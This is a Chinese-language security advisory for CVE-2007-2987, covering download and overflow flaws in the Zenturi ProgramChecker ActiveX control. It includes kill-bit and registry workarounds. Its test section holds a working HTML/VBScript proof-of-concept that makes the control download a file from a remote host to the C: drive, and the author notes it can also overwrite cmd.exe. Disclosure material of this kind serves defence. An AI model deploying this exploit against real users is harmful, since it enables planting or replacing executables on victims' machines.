发布日期：2007-05-29
更新日期：2007-05-31

受影响系统：

Zenturi ProgramChecker ActiveX

描述：

---

BUGTRAQ  ID: 24217
CVE(CAN) ID: CVE-2007-2987

Zenturi ProgramChecker是一组用于分析、验证、认证和搜索PC上所运行程序的程序集。

Zenturi ProgramChecker的sasatl.dll所提供的多个ActiveX控件在处理某些参数时存在多个溢出漏洞，如果用户受骗访问了恶意站点并向有漏洞的参数传送了超长字符串的话，就可能触发这些溢出，导致执行任意指令。

<*来源：Will Dormann
  
  链接：http://secunia.com/advisories/25473/
        http://www.kb.cert.org/vuls/id/603529
        http://secunia.com/advisories/25468/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<pre>
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/30</b></p></span>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------------------------------------
<b>Zenturi ProgramChecker ActiveX (sasatl.dll) Arbitrary file download/overwrite Exploit</b>
url: http://www[dot]programchecker[dot]com/activeintro.aspx

author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to this exploits.

Using the "DownloadFile" method, you can download everything you want on a pc. This
exploit just download a txt file on pc, I try to overwrite cmd.exe and it works.
-------------------------------------------------------------------------------------------

<object classid='clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5' id='test' ></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
Sub tryMe()

test.DownloadFile "http://www.shinnai.altervista.org/shinnai.txt" ,"c:\shinnai.txt" ,"0", "0"

End Sub
</script>
</span></span>
</code></pre>

建议：

---

临时解决方法：

* 在IE中为以下CLSID设置kill bit：

      {048313BB-3B82-47A8-8164-533F1D7C7C9D}
      {0FA0B4FF-1A6F-4D89-995C-29FFD33F4EE0}
      {59DBDDA6-9A80-42A4-B824-9BC50CC172F5}
      {66C7B32A-9642-41A4-BCF7-A166D1547770}
      {6754F588-E262-42D2-A6BC-3BB400ACFEED}
      {7D6B5B24-FC7E-11D1-9288-00104B885781}
      {A364AF35-0CDF-41E8-8F3B-E0E55E15EBA1}

或将以下文本保存为.REG文件并导入：

      Windows Registry Editor Version 5.00

      [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{048313BB-3B82-47A8-8164-533F1D7C7C9D}]
      "Compatibility Flags"=dword:00000400

      [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0FA0B4FF-1A6F-4D89-995C-29FFD33F4EE0}]
      "Compatibility Flags"=dword:00000400

      [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{59DBDDA6-9A80-42A4-B824-9BC50CC172F5}]
      "Compatibility Flags"=dword:00000400

      [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{66C7B32A-9642-41A4-BCF7-A166D1547770}]
      "Compatibility Flags"=dword:00000400

      [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{6754F588-E262-42D2-A6BC-3BB400ACFEED}]
      "Compatibility Flags"=dword:00000400

      [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{7D6B5B24-FC7E-11D1-9288-00104B885781}]
      "Compatibility Flags"=dword:00000400

      [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A364AF35-0CDF-41E8-8F3B-E0E55E15EBA1}]
      "Compatibility Flags"=dword:00000400

厂商补丁：

Zenturi
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www[dot]programchecker[dot]com/

浏览次数：2741
严重程度：0（网友投票）